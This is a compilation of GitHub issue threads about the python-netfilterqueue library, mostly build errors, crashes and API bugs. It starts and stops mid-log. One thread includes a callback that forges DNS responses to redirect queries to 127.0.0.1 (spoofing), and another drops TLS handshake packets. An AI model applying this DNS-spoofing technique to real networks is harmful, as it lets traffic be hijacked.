    netfilterqueue.c:2533:15: warning: assignment to ‘PyObject *’ {aka ‘struct _object *’} from ‘int’ makes pointer from integer without a cast [-Wint-conversion]
         __pyx_t_3 = PyString_FromStringAndSize(((char *)__pyx_v_self->hw_addr), 8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 111, __pyx_L1_error)
                   ^
    netfilterqueue.c: In function ‘__Pyx_PyCFunction_FastCall’:
    netfilterqueue.c:6436:13: error: too many arguments to function ‘(PyObject * (*)(PyObject *, PyObject * const*, Py_ssize_t))meth’
         return (*((__Pyx_PyCFunctionFast)meth)) (self, args, nargs, NULL);
                ~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    netfilterqueue.c: In function ‘__Pyx__ExceptionSave’:
    netfilterqueue.c:7132:21: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
         *type = tstate->exc_type;
                         ^~~~~~~~
                         curexc_type
    netfilterqueue.c:7133:22: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
         *value = tstate->exc_value;
                          ^~~~~~~~~
                          curexc_value
    netfilterqueue.c:7134:19: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
         *tb = tstate->exc_traceback;
                       ^~~~~~~~~~~~~
                       curexc_traceback
    netfilterqueue.c: In function ‘__Pyx__ExceptionReset’:
    netfilterqueue.c:7141:24: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
         tmp_type = tstate->exc_type;
                            ^~~~~~~~
                            curexc_type
    netfilterqueue.c:7142:25: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
         tmp_value = tstate->exc_value;
                             ^~~~~~~~~
                             curexc_value
    netfilterqueue.c:7143:22: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
         tmp_tb = tstate->exc_traceback;
                          ^~~~~~~~~~~~~
                          curexc_traceback
    netfilterqueue.c:7144:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
         tstate->exc_type = type;
                 ^~~~~~~~
                 curexc_type
    netfilterqueue.c:7145:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
         tstate->exc_value = value;
                 ^~~~~~~~~
                 curexc_value
    netfilterqueue.c:7146:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
         tstate->exc_traceback = tb;
                 ^~~~~~~~~~~~~
                 curexc_traceback
    netfilterqueue.c: In function ‘__Pyx__GetException’:
    netfilterqueue.c:7201:24: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
         tmp_type = tstate->exc_type;
                            ^~~~~~~~
                            curexc_type
    netfilterqueue.c:7202:25: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
         tmp_value = tstate->exc_value;
                             ^~~~~~~~~
                             curexc_value
    netfilterqueue.c:7203:22: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
         tmp_tb = tstate->exc_traceback;
                          ^~~~~~~~~~~~~
                          curexc_traceback
    netfilterqueue.c:7204:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
         tstate->exc_type = local_type;
                 ^~~~~~~~
                 curexc_type
    netfilterqueue.c:7205:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
         tstate->exc_value = local_value;
                 ^~~~~~~~~
                 curexc_value
    netfilterqueue.c:7206:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
         tstate->exc_traceback = local_tb;
                 ^~~~~~~~~~~~~
                 curexc_traceback
    error: command 'x86_64-linux-gnu-gcc' failed with exit status 1

    ----------------------------------------
Command "/usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-_s943jue/netfilterqueue/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-record-vjzafq78/install-record.txt --single-version-externally-managed --compile" failed with error code 1 in /tmp/pip-install-_s943jue/netfilterqueue/

The current version of gcc (x86_64-linux-gnu-gcc) is 8.3.0 (Debian 8.3.0-6). I also tried it with version 6; however, also that didn't work:

CC=/usr/bin/gcc-6 pip3 install netfilterqueue

I only could get it installed by using:

# pip3 install -U git+https://github.com/kti/python-netfilterqueue
Collecting git+https://github.com/kti/python-netfilterqueue
  Cloning https://github.com/kti/python-netfilterqueue to /tmp/pip-req-build-z8v91bvq
Building wheels for collected packages: NetfilterQueue
  Running setup.py bdist_wheel for NetfilterQueue ... done
  Stored in directory: /tmp/pip-ephem-wheel-cache-zzngil48/wheels/e2/89/5d/f0b74f24c16fd3cf185715fa9800515f4445d64c0801d2ceb6
Successfully built NetfilterQueue
Installing collected packages: NetfilterQueue
Successfully installed NetfilterQueue-0.8.1

When I drop the packet I get an exception that the verdict has already being given for the packet how can I overcome this

import scapy.all as scapy
import socket
from colorama import Fore,init
from dns import reversename,resolver
import re
init()
def process_packet(packet):
scapy.packet=scapy.IP(packet.get_payload())
if scapy.packet.haslayer(scapy.Raw):
if scapy.packet[scapy.TCP].dport==443:
tcppayload=scapy.packet[scapy.Raw].load
if re.search('\x16\x03',str(tcppayload),flags=0):
print("mull")
packet.drop()

    elif scapy.packet[scapy.TCP].sport==443:
        #print(Fore.GREEN+"[+]HTTP RESPONSE")
        ann=scapy.packet[scapy.IP].src
        #print(str(ann))

packet.accept()

queue=netfilterqueue.NetfilterQueue()
queue.bind(0,process_packet)
queue.run()

Is this package still maintained?

Hey,

I wonder if this package is still maintained, since the last update is from the 31.01.2017 but the status on pypi is still at 5 - Production/Stable.

I would appreciate your answer.

Crash in Packet_set_nfq_data with version 0.8

Version 0.7 works fine but 0.8 gives a segfault in Packet_set_nfq_data. It usually works for a few packets before causing the segfault. I did not observe anything special about the packet at which it crashes.

This was observed on Debian Jessie.

how to deal with fragment?

Hey, it's a great job, I can modify data in net transmission with it, but if the package more than 1460 bytes, it will be fragmented due to IP MTU.

Since the complete message was packed via private protocol, the fragment can't be parsed and modified, is any method for caching fragment in netfilterqueue and send after repackaging, or could you please give any suggestion? Many thanks in advance.

COPY* constants are WRONG!

COPY_NONE = 1
COPY_META = 2
COPY_PACKET = 3

it should be

COPY_NONE = 0
COPY_META = 1
COPY_PACKET = 2

Tests? no, did not hear...

Crash in iptables OUTPUT chain

Hi,
I'm writing a simple code to capture the packet, and print the packet, just as the example code which you give to us. It works fine as the INPUT chain of iptables, but when I change to capture the output packet with OUTPUT chain of iptables, it crash and show the 'segmentation fault'.

I'm working on Ubuntu 16.04

Exception ignored in: 'netfilterqueue.global_callback'

from netfilterqueue import NetfilterQueue
from scapy.all import *

def print_and_accept(pkt):
print(pkt)
pl = IP(pkt.get_payload())
print(pl.show())
pl[IP].dst = "172.17.0.3"
del pl[IP].len, pl[IP].chksum, pl[TCP].chksum
print(">>>payload: ",str(pl))
pkt.set_payload(str(pl))
hw = pkt.get_hw()
if hw:
print(":".join("{:02x}".format(c) for c in hw[0:6]))
pkt.accept()

nfqueue = NetfilterQueue()
nfqueue.bind(0, print_and_accept)
try:
nfqueue.run()
except KeyboardInterrupt:
print('')

nfqueue.unbind()

following is the output:

###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 52
id = 43486
flags = DF
frag = 0
ttl = 127
proto = tcp
chksum = 0x2028
src = 192.168.197.1
dst = 172.17.0.2
\options
###[ TCP ]###
sport = 10732
dport = http
seq = 3132586654
ack = 0
dataofs = 8
reserved = 0
flags = S
window = 64240
chksum = 0xe2cf
urgptr = 0
options = [('MSS', 1460), ('NOP', None), ('WScale', 8), ('NOP', None), ('NOP', None), ('SAckOK', b'')]

None

payload: b'E\x00\x004\xa9\xde@\x00\x7f\x06 (\xc0\xa8\xc5\x01\xac\x11\x00\x03)\xec\x00P\xba\xb7z\x9e\x00\x00\x00\x00\x80\x02\xfa\xf0\xe2\xcf\x00\x00\x02\x04\x05\xb4\x01\x03\x03\x08\x01\x01\x04\x02'
Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
File "nfq3.py", line 10, in print_and_accept
pkt.set_payload(str(pl))
TypeError: Argument 'payload' has incorrect type (expected bytes, got str)

Using python-netfilterqueue with gevent

I tried using this in an application that uses gevent, and because you call the recv system call rather than using python's socket.recv, gevent isn't able to monkey patch your library.

This causes my application to block at unpredictable times.

I've worked around this by adding a method to NetfilterQueue, but wondered if you might have a better idea about how to do it.

def run2(self):
    "Version of the run method which uses normal socket.recv so that gevent can monkeypatch it"
    import socket
    cdef int fd = nfq_fd(self.h)
    s = socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM)
    while True:
        d = s.recv(BufferSize)
        if d >= 0:
            nfq_handle_packet(self.h, d, len(d))
        else:
            break
    s.close()

Update

Please update for python 3.9

nfq_set_verdict2 mark issue with network order

Please, see my comment of 12th of August, the new function nfq_set_verdict2 breaks compatibility with former nfq_set_verdict_mark because of an unnecessary htonl() with the packet mark.
2960dc3

Edit:
There is a pull request already with this feature
#19

using scapy with nfq

I have a code (well, part of it):

def decode_message(pkt):
    bind_layers(UDP, RTP, sport=10000)
    #pkt.decode_payload_as(RTP)
    if pckt[RTP].version == 1:
        mesg = pckt[RTP].load
        word = str(mesg[-1])
        char_bin = word.encode(encoding="utf-8")
        char_hex = char_bin.hex()
        char_bin_str = format(int(char_hex, 16), "08b")
    return char_bin_str[-1]

And I get an error:

Traceback (most recent call last):
  File "payload_read.py", line 14, in decode_message
    if pckt[RTP].version == 1:
TypeError: 'netfilterqueue.Packet' object is not subscriptable

pkt.decode_payload_as(RTP) and if pckt[RTP].version == 1: works great while I don't use Netfilterqueue (those are used with scapy library).
Any ideas how could I disect packets with scapy while using netfilterqueue? How can I separate where packet is used by netfilterqueue and where (same packet) by scapy (Don't know any other place where I could ask)

HW address abnormal in packet

Hello,
I am trying to capture packet using NetfilterQueue, and then analyse with Scapy. But the result was in mess. The real mac is, e.g.,8C:70:5A:8D:B2:90 in my pc, and 08:00:27:8C:55:A0 in my virtual machine.Yet it becomes like this in scapy output:

40:00:40:06:D8:F0 > 45:10:00:58:DE:07 (0xc0a8)
40:00:40:06:6D:42 > 45:10:00:80:49:8E (0xc0a8)
40:00:40:06:D9:13 > 45:10:00:34:DE:08 (0xc0a8)
40:00:40:06:D8:EE > 45:10:00:58:DE:09 (0xc0a8)

Environment:
ubuntu server 16.04
python3.5

Python3: import fails with "undefined symbol: PyString_FromStringAndSize"

As of current master, importing netfilterqueue fails:

ImportError: .../lib/python3.4/site-packages/netfilterqueue.cpython-34.so: undefined symbol: PyString_FromStringAndSize

Issue #9 reports the same problem, but it was closed some time ago, and since then Python 3 support was supposedly merge into master.

So it seems that the problem reappeared again.

get_payload() doesn't return the thing set_payload() was passed

Here is my code

from netfilterqueue import NetfilterQueue
from scapy.all import *

def print_and_accept(raw_pkt):
   # print(raw_pkt.get_payload())
    pkt = IP(raw_pkt.get_payload())
    localIP = "127.0.0.1"
    if not pkt.haslayer(DNSQR):
        raw_pkt.accept()
    else:
        print("got into spoofing")
        spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                          UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                          DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
                          an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=localIP))

        print("spoofed ",  spoofed_pkt)
        raw_pkt.set_payload(str(spoofed_pkt))
        new = IP(raw_pkt.get_payload())
        print("new ", new)
        raw_pkt.accept()
nfqueue = NetfilterQueue()
nfqueue.bind(0, print_and_accept)
try:
    nfqueue.run()
except KeyboardInterrupt:
    print('')

nfqueue.unbind()

After the set_payload, when I print the payload , I see the payload same as the input payload.

And I am not the only person who is facing this issue. Similar case here:
http://stackoverflow.com/questions/43319070/netfilterqueue-set-payload-not-work (This issue is raised by another person)

Am I doing something wrong?

Exceptions are ignored

When an exception is raised in my callback, I simply see a message like this one:

Exception TypeError: "argument of type 'NoneType' is not iterable" in 'netfilterqueue.global_callback' ignored

This makes troubleshooting painful. Is there a safe way for you to allow the exception to terminate the script with the normal stack trace? Short of that, maybe a constructor argument or other mutator to give developers the ability to opt for more detailed exception information?

I'd like to be more helpful but at a glance I can't tell where these exceptions are being handled and silenced. If you can point me to it, I'll be happy to take a crack at a PR.

Installation issue

Specs

Manjaro 17.1.12
Python 3.7.0 (default, Jul 15 2018, 10:44:58) [GCC 8.1.1 20180531]
gcc (GCC) 8.2.0

Issue

Copied from downstream: https://aur.archlinux.org/packages/python-netfilterqueue-git/#comment-661972

Building python-netfilterqueue-git...
Cloning into 'python-netfilterqueue-git'...
remote: Enumerating objects: 8, done.        
remote: Counting objects: 100% (8/8), done.        
remote: Compressing objects: 100% (8/8), done.        
remote: Total 8 (delta 0), reused 8 (delta 0)        
Unpacking objects: 100% (8/8), done.
==> Making package: python-netfilterqueue-git r66.3fa8a38-1 (Thu 06 Sep 2018 07:28:43 PM EDT)
==> Checking runtime dependencies...
==> Checking buildtime dependencies...
==> Retrieving sources...
  -> Cloning python-netfilterqueue git repo...
Cloning into bare repository '/tmp/pamac-build-beast/python-netfilterqueue-git/python-netfilterqueue'...
remote: Counting objects: 267, done.        
remote: Total 267 (delta 0), reused 0 (delta 0), pack-reused 267        
Receiving objects: 100% (267/267), 354.99 KiB | 2.55 MiB/s, done.
Resolving deltas: 100% (177/177), done.
==> Validating source files with sha256sums...
    python-netfilterqueue ... Skipped
==> Extracting sources...
  -> Creating working copy of python-netfilterqueue git repo...
Cloning into 'python-netfilterqueue'...
done.
==> Starting pkgver()...
==> Entering fakeroot environment...
==> Starting package()...
running install
running build
running build_ext
skipping 'netfilterqueue.c' Cython extension (up-to-date)
building 'netfilterqueue' extension
creating build
creating build/temp.linux-x86_64-3.7
gcc -pthread -DNDEBUG -g -fwrapv -O3 -Wall -march=x86-64 -mtune=generic -O2 -pipe -fstack-protector-strong -fno-plt -D_FORTIFY_SOURCE=2 -fPIC -I/usr/include/python3.7m -c netfilterqueue.c -o build/temp.linux-x86_64-3.7/netfilterqueue.o
netfilterqueue.c: In function ‘__pyx_f_14netfilterqueue_6Packet_set_nfq_data’:
netfilterqueue.c:2150:68: warning: passing argument 2 of ‘nfq_get_payload’ from incompatible pointer type [-Wincompatible-pointer-types]
   __pyx_v_self->payload_len = nfq_get_payload(__pyx_v_self->_nfa, (&__pyx_v_self->payload));
                                                                   ~^~~~~~~~~~~~~~~~~~~~~~~
In file included from netfilterqueue.c:440:
/usr/include/libnetfilter_queue/libnetfilter_queue.h:122:67: note: expected ‘unsigned char **’ but argument is of type ‘char **’
 extern int nfq_get_payload(struct nfq_data *nfad, unsigned char **data);
                                                   ~~~~~~~~~~~~~~~~^~~~
netfilterqueue.c: In function ‘__pyx_pf_14netfilterqueue_6Packet_4get_hw’:
netfilterqueue.c:2533:17: warning: implicit declaration of function ‘PyString_FromStringAndSize’; did you mean ‘PyBytes_FromStringAndSize’? [-Wimplicit-function-declaration]
     __pyx_t_3 = PyString_FromStringAndSize(((char *)__pyx_v_self->hw_addr), 8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 111, __pyx_L1_error)
                 ^~~~~~~~~~~~~~~~~~~~~~~~~~
                 PyBytes_FromStringAndSize
netfilterqueue.c:2533:15: warning: assignment to ‘PyObject *’ {aka ‘struct _object *’} from ‘int’ makes pointer from integer without a cast [-Wint-conversion]
     __pyx_t_3 = PyString_FromStringAndSize(((char *)__pyx_v_self->hw_addr), 8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 111, __pyx_L1_error)
               ^
netfilterqueue.c: In function ‘__Pyx_PyCFunction_FastCall’:
netfilterqueue.c:6436:13: error: too many arguments to function ‘(PyObject * (*)(PyObject *, PyObject * const*, Py_ssize_t))meth’
     return (*((__Pyx_PyCFunctionFast)meth)) (self, args, nargs, NULL);
            ~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
netfilterqueue.c: In function ‘__Pyx__ExceptionSave’:
netfilterqueue.c:7132:21: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
     *type = tstate->exc_type;
                     ^~~~~~~~
                     curexc_type
netfilterqueue.c:7133:22: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
     *value = tstate->exc_value;
                      ^~~~~~~~~
                      curexc_value
netfilterqueue.c:7134:19: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
     *tb = tstate->exc_traceback;
                   ^~~~~~~~~~~~~
                   curexc_traceback
netfilterqueue.c: In function ‘__Pyx__ExceptionReset’:
netfilterqueue.c:7141:24: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
     tmp_type = tstate->exc_type;
                        ^~~~~~~~
                        curexc_type
netfilterqueue.c:7142:25: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
     tmp_value = tstate->exc_value;
                         ^~~~~~~~~
                         curexc_value
netfilterqueue.c:7143:22: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
     tmp_tb = tstate->exc_traceback;
                      ^~~~~~~~~~~~~
                      curexc_traceback
netfilterqueue.c:7144:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
     tstate->exc_type = type;
             ^~~~~~~~
             curexc_type
netfilterqueue.c:7145:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
     tstate->exc_value = value;
             ^~~~~~~~~
             curexc_value
netfilterqueue.c:7146:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
     tstate->exc_traceback = tb;
             ^~~~~~~~~~~~~
             curexc_traceback
netfilterqueue.c: In function ‘__Pyx__GetException’:
netfilterqueue.c:7201:24: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
     tmp_type = tstate->exc_type;
                        ^~~~~~~~
                        curexc_type
netfilterqueue.c:7202:25: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
     tmp_value = tstate->exc_value;
                         ^~~~~~~~~
                         curexc_value
netfilterqueue.c:7203:22: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
     tmp_tb = tstate->exc_traceback;
                      ^~~~~~~~~~~~~
                      curexc_traceback
netfilterqueue.c:7204:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_type’; did you mean ‘curexc_type’?
     tstate->exc_type = local_type;
             ^~~~~~~~
             curexc_type
netfilterqueue.c:7205:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_value’; did you mean ‘curexc_value’?
     tstate->exc_value = local_value;
             ^~~~~~~~~
             curexc_value
netfilterqueue.c:7206:13: error: ‘PyThreadState’ {aka ‘struct _ts’} has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’?
     tstate->exc_traceback = local_tb;
             ^~~~~~~~~~~~~
             curexc_traceback
error: command 'gcc' failed with exit status 1
==> ERROR: A failure occurred in package().
    Aborting...

hi, how to install in mac os...

'''
netfilterqueue.c:239:10: fatal error: 'libnfnetlink/linux_nfnetlink.h' file not found
#include "libnfnetlink/linux_nfnetlink.h"
'''

alter ethernet checksum?

Colleagues, I'm using this great package to modify packets "on the fly" and found an issue.

I'm altering TCP checksum before accepting the packet. While there are no issues with TCP checksum, I see (in tcpdump) that Ethernet frame comes to remote host with incorrect checksum:

23:11:33.982227 52:54:00:b3:33:cd > 72:94:09:84:7b:4e, ethertype IPv4 (0x0800), length 84: (tos 0x0, ttl 63, id 29737, offset 0, flags [DF], proto TCP (6), length 70, bad cksum 7980 (->7972)!)
    203.0.113.2.54118 > 10.9.8.11.443: Flags [P.], cksum 0x2a12 (correct), seq 3045093885:3045093903, ack 2778531205, win 507, options [nop,nop,TS val 127397601 ecr 557607335], length 18
    0x0000:  4500 0046 7429 4000 3f06 7980 cb00 7102  E..Ft)@.?.y...q.
    0x0010:  0a09 080b d366 01bb b580 71fd a59d 0585  .....f....q.....
    0x0020:  8018 01fb 2a12 0000 0101 080a 0797 eee1  ....*...........
    0x0030:  213c 69a7 3132 330a 416c 7465 7265 6420  !<i.123.Altered.
    0x0040:  6461 7461 0a0a                           data..

Is it possible to alter ethernet checksum as well? My code at the moment is simply got from the quickstart where there is nothing about Ethernet headers:

def check_and_modify(pkt):
    packet = pkt.get_payload()
    if <multiple checks>:
        <then modify and >
        pkt.set_payload(packet)
    pkt.accept()

nfqueue = NetfilterQueue()
nfqueue.bind(1, check_and_modify)
try:
    nfqueue.run()
except KeyboardInterrupt:
    print('Ctrl-C!')

Thank you!

Debian packaging

Is this lib available from official Debian repository?

If not, could you add it please?

Cannot bind multiple queues

When I try to use netfilter to bind two queue with different queue num, and I add two callbacks methods to bind with the two number.
nfqueue.bind(1, self.in_modify)
nfqueue.bind(2, self.out_modify)

However, the two queues are all bind to the second callback method.
https://github.com/kti/python-netfilterqueue/blob/master/netfilterqueue.pyx#L178

In this line, it's obvious that the pointer user_callback are overwrite when bind another queue. I think here should use a map to support different callbacks for each queue num.

ImportError: /usr/local/lib/python2.6/dist-packages/netfilterqueue.so: undefined symbol: nfq_set_verdict2

My Environment:
Ubuntu Server 10.04 LTS 32bit
python 2.6.5

According to the instruction here:
already done:

apt-get install build-essential python-dev libnetfilter-queue-dev
and tried installing from both ways of From PYPI and From source.

Everytime when I executed from netfilterqueue import NetfilterQueue, I got this error:

ImportError: /usr/local/lib/python2.6/dist-packages/netfilterqueue.so: undefined symbol: nfq_set_verdict2

Already searched google for a whole day, hope to hear from you.

more info:
1.I need to use sudo before all the scripts , because it's not the root.
2.If I executednm /usr/local/lib/python2.6/dist-packages/netfilterqueue.so, I would get:

0000d30b t .L1524
0000d90b t .L1525
0000d8e7 t .L1531
0000d8ed t .L1533
0000d8f3 t .L1534
0000d8f9 t .L1535
0000d8ff t .L1536
0000d905 t .L1537
0000db50 t .L1539
0000db7d t .L1540
0000dbaa t .L1541
0000dbdd t .L1542
0000dc10 t .L1543
0000dc3f t .L1544
0000d3b8 t .L1560
0000d3be t .L1562
0000d3c4 t .L1563
0000d3ca t .L1564
0000d3d0 t .L1565
U PyBaseObject_Type
U PyBaseString_Type
U PyByteArray_Type
U PyCFunction_Type
U PyCObject_FromVoidPtr
U PyCode_New
U PyDict_Copy
U PyDict_GetItem
U PyDict_New
U PyDict_Next
U PyDict_SetItem
U PyDict_Size
U PyErr_Fetch
U PyErr_Format
U PyErr_GivenExceptionMatches
U PyErr_NormalizeException
U PyErr_Occurred
U PyErr_Restore
U PyErr_SetString
U PyErr_WarnEx
U PyErr_WriteUnraisable
U PyEval_RestoreThread
U PyEval_SaveThread
U PyExc_BaseException
U PyExc_ImportError
U PyExc_NameError
U PyExc_OverflowError
U PyExc_SystemError
U PyExc_TypeError
U PyFloat_AsDouble
U PyFloat_FromDouble
U PyFloat_Type
U PyFrame_New
U PyGILState_Ensure
U PyGILState_Release
U PyImport_AddModule
U PyInt_AsSsize_t
U PyInt_FromLong
U PyInt_FromSsize_t
U PyInt_Type
U PyList_New
U PyList_Type
U PyLong_AsLong
U PyLong_AsSsize_t
U PyLong_AsUnsignedLong
U PyLong_FromUnsignedLong
U PyLong_Type
U PyMem_Malloc
U PyMem_Realloc
U PyMethod_Type
U PyModule_GetDict
U PyNumber_Index
U PyNumber_Int
U PyNumber_Long
U PyOS_snprintf
U PyObject_Call
U PyObject_CallFunctionObjArgs
U PyObject_CallMethodObjArgs
U PyObject_GC_UnTrack
U PyObject_GetAttr
U PyObject_GetItem
U PyObject_IsTrue
U PyObject_RichCompare
U PyObject_SetAttrString
U PyObject_Size
U PyString_AsString
U PyString_AsStringAndSize
U PyString_Format
U PyString_FromFormat
U PyString_FromString
U PyString_FromStringAndSize
U PyString_InternFromString
U PyString_Type
U PyTraceBack_Here
U PyTraceBack_Type
U PyTuple_New
U PyTuple_Pack
U PyTuple_Type
U PyType_IsSubtype
U PyType_Ready
U PyUnicodeUCS4_Compare
U PyUnicodeUCS4_DecodeUTF8
U PyUnicodeUCS4_FromStringAndSize
U PyUnicode_Type
U Py_GetVersion
U Py_InitModule4
00004180 t T.1294
00005e30 t T.1295
00004340 t T.1297
000046c0 t T.1298
00011ea8 a _DYNAMIC
00011ff4 a GLOBAL_OFFSET_TABLE
w _Jv_RegisterClasses
U _PyByteArray_empty_string
U _PyString_Eq
U _PyThreadState_Current
U _Py_CheckRecursionLimit
U _Py_CheckRecursiveCall
U _Py_NoneStruct
U _Py_TrueStruct
U _Py_ZeroStruct
00011e94 d CTOR_END
00011e90 d CTOR_LIST
00011e9c d DTOR_END
00011e98 d DTOR_LIST
00010f40 r FRAME_END
00011ea0 d JCR_END
00011ea0 d JCR_LIST
00003a20 t Pyx_AddTraceback
00006f10 t __Pyx_GetBuiltinName
00003620 t __Pyx_PyInt_As_int
00003880 t __Pyx_PyInt_As_u_int16_t
000037d0 t __Pyx_PyInt_As_u_int32_t
000036f0 t __Pyx_PyInt_As_u_int8_t
00003510 t __Pyx_PyNumber_IntOrLong
00004260 t __Pyx_PyObject_CallNoArg
000049e0 t __Pyx_PyObject_CallOneArg
00003470 t __Pyx_PyObject_GetAttrStr
000034c0 t __Pyx_PyObject_IsTrue
00003230 t __Pyx__ExceptionReset
00013520 A __bss_start
w __cxa_finalize@@GLIBC_2.1.3
0000ff30 t __do_global_ctors_aux
00003060 t __do_global_dtors_aux
00012180 d __dso_handle
U __errno_location@@GLIBC_2.0
w __gmon_start

00003117 t i686.get_pc_thunk.bx
00013574 b __pyx_b
000032c0 t __pyx_bisect_code_objects
00013590 b __pyx_builtin_OSError
00013594 b __pyx_builtin_RuntimeWarning
00011ea4 d __pyx_cfilenm
00013544 b __pyx_clineno
00013560 b __pyx_code_cache
00013570 b __pyx_d
000122ae d __pyx_doc_14netfilterqueue_14NetfilterQueue_10run
000122e0 d __pyx_doc_14netfilterqueue_14NetfilterQueue_12run_socket
00012240 d __pyx_doc_14netfilterqueue_14NetfilterQueue_4bind
00012260 d __pyx_doc_14netfilterqueue_14NetfilterQueue_6unbind
00012280 d __pyx_doc_14netfilterqueue_14NetfilterQueue_8get_fd
000121e0 d __pyx_doc_14netfilterqueue_6Packet_10set_payload
00012204 d __pyx_doc_14netfilterqueue_6Packet_16accept
00012217 d __pyx_doc_14netfilterqueue_6Packet_18drop
00012228 d __pyx_doc_14netfilterqueue_6Packet_20repeat
000121a0 d __pyx_doc_14netfilterqueue_6Packet_4get_payload
0001357c b __pyx_empty_bytes
00013578 b __pyx_empty_tuple
00013580 b __pyx_empty_unicode
000050a0 t __pyx_f_14netfilterqueue_6Packet_accept
00004dd0 t __pyx_f_14netfilterqueue_6Packet_drop
00005370 t __pyx_f_14netfilterqueue_6Packet_get_mark
00005f60 t __pyx_f_14netfilterqueue_6Packet_get_payload_len
00006350 t __pyx_f_14netfilterqueue_6Packet_get_timestamp
00004b00 t __pyx_f_14netfilterqueue_6Packet_repeat
000056b0 t __pyx_f_14netfilterqueue_6Packet_set_mark
00004590 t __pyx_f_14netfilterqueue_6Packet_set_nfq_data
00005a30 t __pyx_f_14netfilterqueue_6Packet_set_payload
0000fbc0 t __pyx_f_14netfilterqueue_6Packet_verdict
0000f5e0 t __pyx_f_14netfilterqueue_global_callback
00013588 b __pyx_filename
00003f70 t __pyx_getprop_14netfilterqueue_6Packet_hook
00003ff0 t __pyx_getprop_14netfilterqueue_6Packet_hw_protocol
00004070 t __pyx_getprop_14netfilterqueue_6Packet_id
00003ef0 t __pyx_getprop_14netfilterqueue_6Packet_mark
00003e70 t __pyx_getprop_14netfilterqueue_6Packet_payload
00013440 d __pyx_getsets_14netfilterqueue_Packet
00013878 b __pyx_int_0
0001387c b __pyx_int_1
000138a0 b __pyx_int_10
00013a08 b __pyx_int_100
00013a0c b __pyx_int_101
00013a10 b __pyx_int_102
00013a14 b __pyx_int_103
00013a18 b __pyx_int_104
00013a1c b __pyx_int_105
00013a20 b __pyx_int_106
00013a24 b __pyx_int_107
00013a28 b __pyx_int_108
00013a2c b __pyx_int_109
000138a4 b __pyx_int_11
00013a30 b __pyx_int_110
00013a34 b __pyx_int_111
00013a38 b __pyx_int_112
00013a3c b __pyx_int_113
00013a40 b __pyx_int_114
00013a44 b __pyx_int_115
00013a48 b __pyx_int_116
00013a4c b __pyx_int_117
00013a50 b __pyx_int_118
00013a54 b __pyx_int_119
000138a8 b __pyx_int_12
00013a58 b __pyx_int_120
00013a5c b __pyx_int_121
00013a60 b __pyx_int_122
00013a64 b __pyx_int_123
00013a68 b __pyx_int_124
00013a6c b __pyx_int_125
00013a70 b __pyx_int_126
00013a74 b __pyx_int_127
00013a78 b __pyx_int_128
00013a7c b __pyx_int_129
000138ac b __pyx_int_13
